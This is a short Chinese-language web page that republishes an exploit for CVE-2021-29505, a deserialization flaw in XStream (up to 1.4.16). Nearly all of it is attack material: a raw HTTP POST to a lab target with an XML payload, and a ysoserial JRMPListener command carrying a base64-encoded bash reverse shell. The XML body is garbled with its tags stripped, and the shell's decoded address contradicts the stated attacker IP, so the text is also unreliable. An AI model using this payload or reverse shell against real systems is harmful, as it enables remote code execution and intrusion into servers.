CVE-2021-29505 XStream反序列化命令执行-棉花糖会员站

# CVE-2021-29505 XStream反序列化命令执行

影响版本：

– XStream <= 1.4.16 exp: ``` 攻击机：192.168.20.128 xstream机器 : 192.168.20.129 POST / HTTP/1.1 Host: 192.168.20.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/xml Content-Length: 3117

2

3

12345

com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content

12345

true SOAP_11

false

aa
aa

UnicastRef
192.168.20.128
1099
0
0
0
0
false

192.168.20.128 1099

本地RMI监听：
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}”
“`

[@hatjwe](https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488482&idx=1&sn=453714065c200b8bfe15693c937bc336)

文章版权归作者所有，未经允许请勿转载。

THE END